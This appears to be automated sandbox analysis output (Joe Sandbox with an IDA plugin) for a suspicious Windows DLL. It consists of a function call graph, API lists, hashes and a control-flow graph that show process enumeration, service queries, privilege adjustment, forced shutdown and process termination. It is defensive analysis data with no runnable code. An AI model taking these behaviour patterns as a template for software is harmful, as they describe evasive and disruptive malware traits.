100732->100731 100734 6c7949ed 100733->100734 100734->100735 100736 6c7949f1 100734->100736 100740 6c794a69 100735->100740 100741 6c794a63 100735->100741 100737 6c7971e5 __Getctype EnterCriticalSection LeaveCriticalSection HeapAlloc 100736->100737 100739 6c7949fd 100737->100739 100742 6c794a1c 100739->100742 100743 6c794a05 100739->100743 100745 6c790ac9 __Getctype 35 API calls 100740->100745 100741->100713 100741->100716 100746 6c796b62 __Getctype 6 API calls 100742->100746 100744 6c796b62 __Getctype 6 API calls 100743->100744 100747 6c794a13 100744->100747 100748 6c794a6e 100745->100748 100749 6c794a28 100746->100749 100752 6c7947bb _free HeapFree GetLastError 100747->100752 100750 6c794a3d 100749->100750 100751 6c794a2c 100749->100751 100755 6c7947bb _free HeapFree GetLastError 100750->100755 100753 6c796b62 __Getctype 6 API calls 100751->100753 100754 6c794a19 100752->100754 100753->100747 100754->100735 100755->100754 100756->100651 100757->100658 100759 6c79b9cd __wsopen_s 100758->100759 100767 6c7a1990 EnterCriticalSection 100759->100767 100761 6c79b9db 100762 6c79b925 __wsopen_s 21 API calls 100761->100762 100763 6c79ba08 100761->100763 100762->100763 100768 6c79ba41 LeaveCriticalSection __wsopen_s 100763->100768 100765 6c79ba2a 100765->100664 100766->100664 100767->100761 100768->100765 100769->100305 100770->100307 100771->100305 100772->100305 100773->100305 100775 6c65022e 100774->100775 100776 6c6270c4 100775->100776 100781 6c7917db 100775->100781 100776->100318 100778->100319 100779->100321 100780->100323 100782 6c7917e9 100781->100782 100783 6c791806 100781->100783 100782->100783 100784 6c79180a 100782->100784 100785 6c7917f6 100782->100785 100783->100775 100789 6c791a02 100784->100789 100797 6c790120 18 API calls __Getctype 100785->100797 100790 6c791a0e __wsopen_s 100789->100790 100798 6c78c5a9 EnterCriticalSection 100790->100798 100792 6c791a1c 100799 6c7919bf 100792->100799 100796 6c79183c 100796->100775 100797->100783 100798->100792 100807 6c7985a6 100799->100807 100805 6c7919f9 100806 6c791a51 LeaveCriticalSection 100805->100806 100806->100796 100808 6c799c60 18 API calls 100807->100808 100809 6c7985b7 100808->100809 100810 6c7a19e5 __wsopen_s 18 API calls 100809->100810 100811 6c7985bd __wsopen_s 100810->100811 100812 6c7919d3 100811->100812 100824 6c7947bb HeapFree GetLastError __dosmaperr 100811->100824 100814 6c79183e 100812->100814 100816 6c791850 100814->100816 100819 6c79186e 100814->100819 100815 6c79185e 100825 6c790120 18 API calls __Getctype 100815->100825 100816->100815 100818 6c791886 _Yarn 100816->100818 100816->100819 100818->100819 100820 6c790cb9 62 API calls 100818->100820 100821 6c799c60 18 API calls 100818->100821 100822 6c79bb6c __wsopen_s 62 API calls 100818->100822 100823 6c798659 62 API calls 100819->100823 100820->100818 100821->100818 100822->100818 100823->100805 100824->100812 100825->100819 100826 6c604b53 100827 6c786a43 std::_Facet_Register 4 API calls 100826->100827 100828 6c604b5c _Yarn 100827->100828 100829 6c77aec0 2 API calls 100828->100829 100834 6c604bae std::ios_base::_Ios_base_dtor 100829->100834 100830 6c62639e 101028 6c790130 18 API calls __Getctype 100830->101028 100832 6c604cff 100833 6c605164 CreateFileA CloseHandle 100838 6c6051ec 100833->100838 100834->100830 100834->100832 100834->100833 100835 6c61245a _Yarn _strlen 100834->100835 100835->100830 100836 6c77aec0 2 API calls 100835->100836 100841 6c612a83 std::ios_base::_Ios_base_dtor 100836->100841 100984 6c785120 OpenSCManagerA 100838->100984 100840 6c60fc00 101021 6c785240 CreateToolhelp32Snapshot 100840->101021 100841->100830 100988 6c770390 100841->100988 100842 6c60ffe3 100846 6c610abc 100842->100846 100852 6c785240 4 API calls 100842->100852 100845 6c786a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100848 6c605478 std::ios_base::_Ios_base_dtor _Yarn _strlen 100845->100848 100846->100835 100854 6c785240 4 API calls 100846->100854 100848->100830 100848->100840 100848->100845 100850 6c77aec0 2 API calls 100848->100850 100856 6c626ba0 104 API calls 100848->100856 100857 6c626e60 32 API calls 100848->100857 100859 6c627090 77 API calls 100848->100859 100863 6c64e010 67 API calls 100848->100863 100872 6c606162 100848->100872 100873 6c606722 100848->100873 100849 6c6137d0 Sleep 100890 6c6137e0 std::ios_base::_Ios_base_dtor _Yarn _strlen 100849->100890 100850->100848 100851 6c6263b2 101029 6c6015e0 18 API calls std::ios_base::_Ios_base_dtor 100851->101029 100867 6c61053a 100852->100867 100876 6c6112e2 100854->100876 100855 6c6264f8 100856->100848 100857->100848 100859->100848 100860 6c785240 4 API calls 100860->100846 100861 6c785240 4 API calls 100879 6c611dd9 100861->100879 100862 6c61211c 100862->100835 100864 6c61241a 100862->100864 100863->100848 100866 6c770390 11 API calls 100864->100866 100865 6c77aec0 2 API calls 100865->100890 100868 6c61244d 100866->100868 100867->100846 100867->100860 101027 6c785d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100868->101027 100870 6c612452 Sleep 100870->100835 100871 6c6116ac 100997 6c781880 25 API calls 4 library calls 100873->100997 100875 6c60740b 100998 6c784ff0 CreateProcessA 100875->100998 100876->100861 100876->100862 100876->100871 100877 6c785240 4 API calls 100877->100862 100878 6c626ba0 104 API calls 100878->100890 100879->100862 100879->100877 100880 6c626e60 32 API calls 100880->100890 100881 6c627090 77 API calls 100881->100890 100882 6c64e010 67 API calls 100882->100890 100883 6c60775a _strlen 100883->100830 100884 6c607b92 100883->100884 100885 6c607ba9 100883->100885 100888 6c607b43 _Yarn 100883->100888 100886 6c786a43 std::_Facet_Register 4 API calls 100884->100886 100887 6c786a43 std::_Facet_Register 4 API calls 100885->100887 100886->100888 100887->100888 100889 6c77aec0 2 API calls 100888->100889 100899 6c607be7 std::ios_base::_Ios_base_dtor 100889->100899 100890->100830 100890->100865 100890->100878 100890->100880 100890->100881 100890->100882 100891 6c784ff0 4 API calls 100902 6c608a07 100891->100902 100892 6c609d68 100894 6c786a43 std::_Facet_Register 4 API calls 100892->100894 100893 6c609d7f 100895 6c786a43 std::_Facet_Register 4 API calls 100893->100895 100897 6c609d18 _Yarn 100894->100897 100895->100897 100896 6c60962c _strlen 100896->100830 100896->100892 100896->100893 100896->100897 100898 6c77aec0 2 API calls 100897->100898 100906 6c609dbd std::ios_base::_Ios_base_dtor 100898->100906 100899->100830 100899->100891 100899->100896 100900 6c608387 100899->100900 100901 6c784ff0 4 API calls 100910 6c609120 100901->100910 100902->100901 100903 6c784ff0 4 API calls 100920 6c60a215 _strlen 100903->100920 100904 6c784ff0 4 API calls 100905 6c609624 100904->100905 101002 6c785d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100905->101002 100906->100830 100906->100903 100911 6c60e8b5 std::ios_base::_Ios_base_dtor _Yarn _strlen 100906->100911 100907 6c786a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 100907->100911 100909 6c77aec0 2 API calls 100909->100911 100910->100904 100911->100830 100911->100907 100911->100909 100912 6c60f7b1 100911->100912 100913 6c60ed02 Sleep 100911->100913 101020 6c785d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100912->101020 100932 6c60e8c1 100913->100932 100915 6c60e8dd GetCurrentProcess TerminateProcess 100915->100911 100916 6c60a9a4 100918 6c786a43 std::_Facet_Register 4 API calls 100916->100918 100917 6c60a9bb 100919 6c786a43 std::_Facet_Register 4 API calls 100917->100919 100929 6c60a953 _Yarn _strlen 100918->100929 100919->100929 100920->100830 100920->100916 100920->100917 100920->100929 100921 6c784ff0 4 API calls 100921->100932 100922 6c60fbb8 100924 6c60fbe8 ExitWindowsEx Sleep 100922->100924 100923 6c60f7c0 100923->100922 100924->100840 100925 6c60aff0 100927 6c786a43 std::_Facet_Register 4 API calls 100925->100927 100926 6c60b009 100928 6c786a43 std::_Facet_Register 4 API calls 100926->100928 100930 6c60afa0 _Yarn 100927->100930 100928->100930 100929->100851 100929->100925 100929->100926 100929->100930 101003 6c785960 100930->101003 100932->100911 100932->100915 100932->100921 100933 6c60b059 std::ios_base::_Ios_base_dtor _strlen 100933->100830 100934 6c60b443 100933->100934 100935 6c60b42c 100933->100935 100938 6c60b3da _Yarn _strlen 100933->100938 100937 6c786a43 std::_Facet_Register 4 API calls 100934->100937 100936 6c786a43 std::_Facet_Register 4 API calls 100935->100936 100936->100938 100937->100938 100938->100851 100939 6c60b7b7 100938->100939 100940 6c60b79e 100938->100940 100943 6c60b751 _Yarn 100938->100943 100942 6c786a43 std::_Facet_Register 4 API calls 100939->100942 100941 6c786a43 std::_Facet_Register 4 API calls 100940->100941 100941->100943 100942->100943 100944 6c785960 104 API calls 100943->100944 100945 6c60b804 std::ios_base::_Ios_base_dtor _strlen 100944->100945 100945->100830 100946 6c60bc26 100945->100946 100947 6c60bc0f 100945->100947 100950 6c60bbbd _Yarn _strlen 100945->100950 100949 6c786a43 std::_Facet_Register 4 API calls 100946->100949 100948 6c786a43 std::_Facet_Register 4 API calls 100947->100948 100948->100950 100949->100950 100950->100851 100951 6c60c075 100950->100951 100952 6c60c08e 100950->100952 100955 6c60c028 _Yarn 100950->100955 100953 6c786a43 std::_Facet_Register 4 API calls 100951->100953 100954 6c786a43 std::_Facet_Register 4 API calls 100952->100954 100953->100955 100954->100955 100956 6c785960 104 API calls 100955->100956 100961 6c60c0db std::ios_base::_Ios_base_dtor _strlen 100956->100961 100957 6c60c7a5 100959 6c786a43 std::_Facet_Register 4 API calls 100957->100959 100958 6c60c7bc 100960 6c786a43 std::_Facet_Register 4 API calls 100958->100960 100968 6c60c753 _Yarn _strlen 100959->100968 100960->100968 100961->100830 100961->100957 100961->100958 100961->100968 100962 6c60d406 100965 6c786a43 std::_Facet_Register 4 API calls 100962->100965 100963 6c60d3ed 100964 6c786a43 std::_Facet_Register 4 API calls 100963->100964 100966 6c60d39a _Yarn 100964->100966 100965->100966 100967 6c785960 104 API calls 100966->100967 100969 6c60d458 std::ios_base::_Ios_base_dtor _strlen 100967->100969 100968->100851 100968->100962 100968->100963 100968->100966 100974 6c60cb2f 100968->100974 100969->100830 100970 6c60d8a4 100969->100970 100971 6c60d8bb 100969->100971 100975 6c60d852 _Yarn _strlen 100969->100975 100972 6c786a43 std::_Facet_Register 4 API calls 100970->100972 100973 6c786a43 std::_Facet_Register 4 API calls 100971->100973 100972->100975 100973->100975 100975->100851 100976 6c60dcb6 100975->100976 100977 6c60dccf 100975->100977 100980 6c60dc69 _Yarn 100975->100980 100978 6c786a43 std::_Facet_Register 4 API calls 100976->100978 100979 6c786a43 std::_Facet_Register 4 API calls 100977->100979 100978->100980 100979->100980 100981 6c785960 104 API calls 100980->100981 100983 6c60dd1c std::ios_base::_Ios_base_dtor 100981->100983 100982 6c784ff0 4 API calls 100982->100911 100983->100830 100983->100982 100986 6c785156 100984->100986 100985 6c7851e8 OpenServiceA 100985->100986 100986->100985 100987 6c78522f 100986->100987 100987->100848 100993 6c7703a3 _Yarn __wsopen_s std::locale::_Setgloballocale _strlen 100988->100993 100989 6c77310e CloseHandle 100989->100993 100990 6c773f5f CloseHandle 100990->100993 100991 6c77251b CloseHandle 100991->100993 100992 6c6137cb 100996 6c785d60 GetCurrentProcess OpenProcessToken LookupPrivilegeValueW AdjustTokenPrivileges NtInitiatePowerAction 100992->100996 100993->100989 100993->100990 100993->100991 100993->100992 100994 6c75c1e0 WriteFile WriteFile WriteFile ReadFile 100993->100994 101030 6c75b730 100993->101030 100994->100993 100996->100849 100997->100875 100999 6c7850ca 100998->100999 101000 6c785080 WaitForSingleObject CloseHandle CloseHandle 100999->101000 101001 6c7850e3 100999->101001 101000->100999 101001->100883 101002->100896 101004 6c7859b7 101003->101004 101041 6c785ff0 101004->101041 101006 6c7859c8 101007 6c626ba0 104 API calls 101006->101007 101012 6c7859ec 101007->101012 101008 6c64e010 67 API calls 101009 6c785a9f std::ios_base::_Ios_base_dtor 101008->101009 101011 6c64e010 67 API calls 101009->101011 101018 6c785ae2 std::ios_base::_Ios_base_dtor 101011->101018 101013 6c785a54 101012->101013 101019 6c785a67 101012->101019 101060 6c786340 101012->101060 101068 6c662000 101012->101068 101078 6c785b90 101013->101078 101016 6c785a5c 101017 6c627090 77 API calls 101016->101017 101017->101019 101018->100933 101019->101008 101020->100923 101022 6c7852a0 std::locale::_Setgloballocale 101021->101022 101023 6c785277 CloseHandle 101022->101023 101024 6c785320 Process32NextW 101022->101024 101025 6c7853b1 101022->101025 101026 6c785345 Process32FirstW 101022->101026 101023->101022 101024->101022 101025->100842 101026->101022 101027->100870 101029->100855 101031 6c75b743 _Yarn __wsopen_s std::locale::_Setgloballocale 101030->101031 101032 6c75c180 101031->101032 101033 6c75bced CreateFileA 101031->101033 101035 6c75aa30 101031->101035 101032->100993 101033->101031 101038 6c75aa43 __wsopen_s std::locale::_Setgloballocale 101035->101038 101036 6c75b3e9 WriteFile 101036->101038 101037 6c75b43d WriteFile 101037->101038 101038->101036 101038->101037 101039 6c75b718 101038->101039 101040 6c75ab95 ReadFile 101038->101040 101039->101031 101040->101038 101042 6c786025 101041->101042 101043 6c652020 52 API calls 101042->101043 101044 6c7860c6 101043->101044 101045 6c786a43 std::_Facet_Register 4 API calls 101044->101045 101046 6c7860fe 101045->101046 101047 6c787327 43 API calls 101046->101047 101048 6c786112 101047->101048 101049 6c651d90 89 API calls 101048->101049 101050 6c7861bb 101049->101050 101051 6c7861ec 101050->101051 101093 6c652250 30 API calls 101050->101093 101051->101006 101053 6c786226 101094 6c6526e0 24 API calls 4 library calls 101053->101094 101055 6c786238 101095 6c789379 RaiseException 101055->101095 101057 6c78624d 101058 6c64e010 67 API calls 101057->101058 101059 6c78625f 101058->101059 101059->101006 101061 6c78638d 101060->101061 101096 6c7865a0 101061->101096 101063 6c78647c 101063->101012 101066 6c7863a5 101066->101063 101114 6c652250 30 API calls 101066->101114 101115 6c6526e0 24 API calls 4 library calls 101066->101115 101116 6c789379 RaiseException 101066->101116 101069 6c66203f 101068->101069 101072 6c662053 101069->101072 101125 6c653560 32 API calls std::_Xinvalid_argument 101069->101125 101074 6c66210e 101072->101074 101127 6c652250 30 API calls 101072->101127 101128 6c6526e0 24 API calls 4 library calls 101072->101128 101129 6c789379 RaiseException 101072->101129 101073 6c662121 101073->101012 101074->101073 101126 6c6537e0 32 API calls std::_Xinvalid_argument 101074->101126 101079 6c785b9e 101078->101079 101083 6c785bd1 101078->101083 101080 6c6501f0 64 API calls 101079->101080 101082 6c785bc4 101080->101082 101081 6c785c83 101081->101016 101084 6c790b18 67 API calls 101082->101084 101083->101081 101130 6c652250 30 API calls 101083->101130 101084->101083 101086 6c785cae 101131 6c652340 24 API calls 101086->101131 101088 6c785cbe 101132 6c789379 RaiseException 101088->101132 101090 6c785cc9 101091 6c64e010 67 API calls 101090->101091 101092 6c785d22 std::ios_base::_Ios_base_dtor 101091->101092 101092->101016 101093->101053 101094->101055 101095->101057 101097 6c786608 101096->101097 101098 6c7865dc 101096->101098 101105 6c786619 101097->101105 101117 6c653560 32 API calls std::_Xinvalid_argument 101097->101117 101099 6c786601 101098->101099 101119 6c652250 30 API calls 101098->101119 101099->101066 101102 6c7867e8 101120 6c652340 24 API calls 101102->101120 101104 6c7867f7 101121 6c789379 RaiseException 101104->101121 101105->101099 101118 6c652f60 42 API calls 4 library calls 101105->101118 101109 6c786827 101123 6c652340 24 API calls 101109->101123 101111 6c78683d 101124 6c789379 RaiseException 101111->101124 101113 6c786653 101113->101099 101122 6c652250 30 API calls 101113->101122 101114->101066 101115->101066 101116->101066 101117->101105 101118->101113 101119->101102 101120->101104 101121->101113 101122->101109 101123->101111 101124->101099 101125->101072 101126->101073 101127->101072 101128->101072 101129->101072 101130->101086 101131->101088 101132->101090 101133 6c614a27 101134 6c614a5d _strlen 101133->101134 101135 6c62639e 101134->101135 101136 6c615b58 101134->101136 101137 6c615b6f 101134->101137 101141 6c615b09 _Yarn 101134->101141 101224 6c790130 18 API calls __Getctype 101135->101224 101138 6c786a43 std::_Facet_Register 4 API calls 101136->101138 101139 6c786a43 std::_Facet_Register 4 API calls 101137->101139 101138->101141 101139->101141 101142 6c77aec0 2 API calls 101141->101142 101144 6c615bad std::ios_base::_Ios_base_dtor 101142->101144 101143 6c784ff0 4 API calls 101149 6c6161cb _strlen 101143->101149 101144->101135 101144->101143 101147 6c619ba5 std::ios_base::_Ios_base_dtor _Yarn _strlen 101144->101147 101145 6c786a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 101145->101147 101146 6c77aec0 2 API calls 101146->101147 101147->101135 101147->101145 101147->101146 101148 6c61a292 Sleep 101147->101148 101166 6c61e619 101147->101166 101188 6c619bb1 std::ios_base::_Ios_base_dtor _Yarn _strlen 101148->101188 101149->101135 101150 6c616624 101149->101150 101151 6c61660d 101149->101151 101157 6c6165bc _Yarn _strlen 101149->101157 101153 6c786a43 std::_Facet_Register 4 API calls 101150->101153 101152 6c786a43 std::_Facet_Register 4 API calls 101151->101152 101152->101157 101153->101157 101154 6c619bbd GetCurrentProcess TerminateProcess 101154->101147 101155 6c6263b2 101225 6c6015e0 18 API calls std::ios_base::_Ios_base_dtor 101155->101225 101157->101155 101159 6c616970 101157->101159 101160 6c616989 101157->101160 101163 6c616920 _Yarn 101157->101163 101158 6c6264f8 101161 6c786a43 std::_Facet_Register 4 API calls 101159->101161 101162 6c786a43 std::_Facet_Register 4 API calls 101160->101162 101161->101163 101162->101163 101164 6c785960 104 API calls 101163->101164 101167 6c6169d6 std::ios_base::_Ios_base_dtor _strlen 101164->101167 101165 6c61f243 CreateFileA 101182 6c61f2a7 101165->101182 101166->101165 101167->101135 101168 6c616dd2 101167->101168 101169 6c616dbb 101167->101169 101178 6c616d69 _Yarn _strlen 101167->101178 101172 6c786a43 std::_Facet_Register 4 API calls 101168->101172 101171 6c786a43 std::_Facet_Register 4 API calls 101169->101171 101170 6c6202ca 101171->101178 101172->101178 101173 6c785960 104 API calls 101173->101188 101174 6c617440 101177 6c786a43 std::_Facet_Register 4 API calls 101174->101177 101175 6c617427 101176 6c786a43 std::_Facet_Register 4 API calls 101175->101176 101179 6c6173da _Yarn 101176->101179 101177->101179 101178->101155 101178->101174 101178->101175 101178->101179 101180 6c785960 104 API calls 101179->101180 101183 6c61748d std::ios_base::_Ios_base_dtor _strlen 101180->101183 101181 6c6202ac GetCurrentProcess TerminateProcess 101181->101170 101182->101170 101182->101181 101183->101135 101184 6c617991 101183->101184 101185 6c6179a8 101183->101185 101193 6c617940 _Yarn _strlen 101183->101193 101186 6c786a43 std::_Facet_Register 4 API calls 101184->101186 101187 6c786a43 std::_Facet_Register 4 API calls 101185->101187 101186->101193 101187->101193 101188->101135 101188->101147 101188->101154 101188->101155 101188->101173 101220 6c786a43 IsProcessorFeaturePresent RaiseException EnterCriticalSection LeaveCriticalSection std::_Facet_Register 101188->101220 101223 6c784ff0 CreateProcessA WaitForSingleObject CloseHandle CloseHandle 101188->101223 101189 6c617de2 101192 6c786a43 std::_Facet_Register 4 API calls 101189->101192 101190 6c617dc9 101191 6c786a43 std::_Facet_Register 4 API calls 101190->101191 101194 6c617d7c _Yarn 101191->101194 101192->101194 101193->101155 101193->101189 101193->101190 101193->101194 101195 6c785960 104 API calls 101194->101195 101196 6c617e2f std::ios_base::_Ios_base_dtor _strlen 101195->101196 101196->101135 101197 6c6185a8 101196->101197 101198 6c6185bf 101196->101198 101206 6c618556 _Yarn _strlen 101196->101206 101199 6c786a43 std::_Facet_Register 4 API calls 101197->101199 101200 6c786a43 std::_Facet_Register 4 API calls 101198->101200 101199->101206 101200->101206 101201 6c618983 101204 6c786a43 std::_Facet_Register 4 API calls 101201->101204 101202 6c61896a 101203 6c786a43 std::_Facet_Register 4 API calls 101202->101203 101205 6c61891d _Yarn 101203->101205 101204->101205 101207 6c785960 104 API calls 101205->101207 101206->101155 101206->101201 101206->101202 101206->101205 101208 6c6189d0 std::ios_base::_Ios_base_dtor _strlen 101207->101208 101208->101135 101209 6c618f36 101208->101209 101210 6c618f1f 101208->101210 101213 6c618ecd _Yarn _strlen 101208->101213 101212 6c786a43 std::_Facet_Register 4 API calls 101209->101212 101211 6c786a43 std::_Facet_Register 4 API calls 101210->101211 101211->101213 101212->101213 101213->101155 101214 6c619354 101213->101214 101215 6c61936d 101213->101215 101218 6c619307 _Yarn 101213->101218 101216 6c786a43 std::_Facet_Register 4 API calls 101214->101216 101217 6c786a43 std::_Facet_Register 4 API calls 101215->101217 101216->101218 101217->101218 101219 6c785960 104 API calls 101218->101219 101222 6c6193ba std::ios_base::_Ios_base_dtor 101219->101222 101220->101188 101221 6c784ff0 4 API calls 101221->101147 101222->101135 101222->101221 101223->101188 101225->101158 101226 6c78ef3f 101227 6c78ef4b __wsopen_s 101226->101227 101228 6c78ef5f 101227->101228 101229 6c78ef52 GetLastError ExitThread 101227->101229 101230 6c7949b2 __Getctype 37 API calls 101228->101230 101231 6c78ef64 101230->101231 101238 6c799d66 101231->101238 101234 6c78ef7b 101244 6c78eeaa 16 API calls 2 library calls 101234->101244 101237 6c78ef9d 101239 6c799d78 GetPEB 101238->101239 101240 6c78ef6f 101238->101240 101239->101240 101241 6c799d8b 101239->101241 101240->101234 101243 6c796d6f 5 API calls std::_Lockit::_Lockit 101240->101243 101245 6c796e18 5 API calls std::_Lockit::_Lockit 101241->101245 101243->101234 101244->101237 101245->101240 101246 6c79cad3 101247 6c79cae5 __dosmaperr 101246->101247 101248 6c79cafd 101246->101248 101248->101247 101250 6c79cb48 __dosmaperr 101248->101250 101251 6c79cb77 101248->101251 101288 6c790120 18 API calls __Getctype 101250->101288 101252 6c79cb90 101251->101252 101253 6c79cbe7 __wsopen_s 101251->101253 101254 6c79cbab __dosmaperr 101251->101254 101252->101254 101273 6c79cb95 101252->101273 101282 6c7947bb HeapFree GetLastError __dosmaperr 101253->101282 101281 6c790120 18 API calls __Getctype 101254->101281 101255 6c7a19e5 __wsopen_s 18 API calls 101257 6c79cd3e 101255->101257 101260 6c79cdb4 101257->101260 101263 6c79cd57 GetConsoleMode 101257->101263 101258 6c79cc07 101283 6c7947bb HeapFree GetLastError __dosmaperr 101258->101283 101262 6c79cdb8 ReadFile 101260->101262 101265 6c79ce2c GetLastError 101262->101265 101266 6c79cdd2 101262->101266 101263->101260 101267 6c79cd68 101263->101267 101264 6c79cc0e 101276 6c79cbc2 __dosmaperr __wsopen_s 101264->101276 101284 6c79ac69 20 API calls __wsopen_s 101264->101284 101265->101276 101266->101265 101271 6c79cda9 101266->101271 101267->101262 101268 6c79cd6e ReadConsoleW 101267->101268 101268->101271 101272 6c79cd8a GetLastError 101268->101272 101274 6c79ce0e 101271->101274 101275 6c79cdf7 101271->101275 101271->101276 101272->101276 101273->101255 101274->101276 101277 6c79ce25 101274->101277 101286 6c79cefe 23 API calls 3 library calls 101275->101286 101285 6c7947bb HeapFree GetLastError __dosmaperr 101276->101285 101287 6c79d1b6 21 API calls __wsopen_s 101277->101287 101280 6c79ce2a 101280->101276 101281->101276 101282->101258 101283->101264 101284->101273 101285->101247 101286->101276 101287->101280 101288->101247
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: _strlen
                                            • String ID: HR^
                                            • API String ID: 4218353326-1341859651
                                            • Opcode ID: dadaa5eee5a6392d00d19c5dbb34582a124f45bc14799481f527a4ff7ac1e2a3
                                            • Instruction ID: 79ee3095d9fe505e0b9dfbf07546e9e7332cafb1a54861629afe3419e74ac189
                                            • Opcode Fuzzy Hash: dadaa5eee5a6392d00d19c5dbb34582a124f45bc14799481f527a4ff7ac1e2a3
                                            • Instruction Fuzzy Hash: DE741571744B028FC728CF28C9D06D5B7F3EF95318B198A2DC0A68BA55EB74B54ACB44
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: }jk$;T55$L@^
                                            • API String ID: 0-4218709813
                                            • Opcode ID: 8e09a7e5c3d64daa977af8ea23a76111949cfe5b303b50a0b87e9218a89ed394
                                            • Instruction ID: e92e9d3d0524d6b59faddd332ccb77c11f8609b6bbc71985c20bc8f34c8c1e5a
                                            • Opcode Fuzzy Hash: 8e09a7e5c3d64daa977af8ea23a76111949cfe5b303b50a0b87e9218a89ed394
                                            • Instruction Fuzzy Hash: AD3417716497018FC728CF2CC8D0A96B7E3EF85319B198A2DC0968BF55EB74B54ACB40

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 7677 6c785240-6c785275 CreateToolhelp32Snapshot 7678 6c7852a0-6c7852a9 7677->7678 7679 6c7852ab-6c7852b0 7678->7679 7680 6c7852e0-6c7852e5 7678->7680 7681 6c7852b2-6c7852b7 7679->7681 7682 6c785315-6c78531a 7679->7682 7683 6c7852eb-6c7852f0 7680->7683 7684 6c785377-6c7853a1 call 6c792c05 7680->7684 7686 6c7852b9-6c7852be 7681->7686 7687 6c785334-6c78535d call 6c78b920 Process32FirstW 7681->7687 7690 6c785320-6c785332 Process32NextW 7682->7690 7691 6c7853a6-6c7853ab 7682->7691 7688 6c7852f2-6c7852f7 7683->7688 7689 6c785277-6c785292 CloseHandle 7683->7689 7684->7678 7686->7678 7693 6c7852c0-6c7852d1 7686->7693 7697 6c785362-6c785372 7687->7697 7688->7678 7695 6c7852f9-6c785313 7688->7695 7689->7678 7690->7697 7691->7678 7694 6c7853b1-6c7853bf 7691->7694 7693->7678 7695->7678 7697->7678
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 6C78524E
                                            Memory Dump Source
                                            • Source File: 00000006.00000002.2247035989.000000006C601000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C600000, based on PE: true
                                            • Associated: 00000006.00000002.2247009003.000000006C600000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248424081.000000006C7A8000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2248503093.000000006C7B8000.00000008.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249148698.000000006C883000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249193478.000000006C889000.00000020.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 00000006.00000002.2249898765.000000006C972000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_6_2_6c600000_#U5b89#U88c5#U52a9#U624b_2.jbxd
                                            Similarity
                                            • API ID: CreateSnapshotToolhelp32
                                            • String ID:
                                            • API String ID: 3332741929-0
                                            • Opcode ID: 78043f46dee295e9f8a51bc2dab952d7dcea63dfc07fc368934777b445bbfed2
                                            • Instruction ID: 241e94b49ca30628cbbbb26027cd3873d608736889f9e4041a874be9ce0481a1
                                            • Opcode Fuzzy Hash: 78043f46dee295e9f8a51bc2dab952d7dcea63dfc07fc368934777b445bbfed2
                                            • Instruction Fuzzy Hash: FB31BFB520A3009FE7519F29D988B0ABBF4AF86368F50493DF689C7760D770D8488B53

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
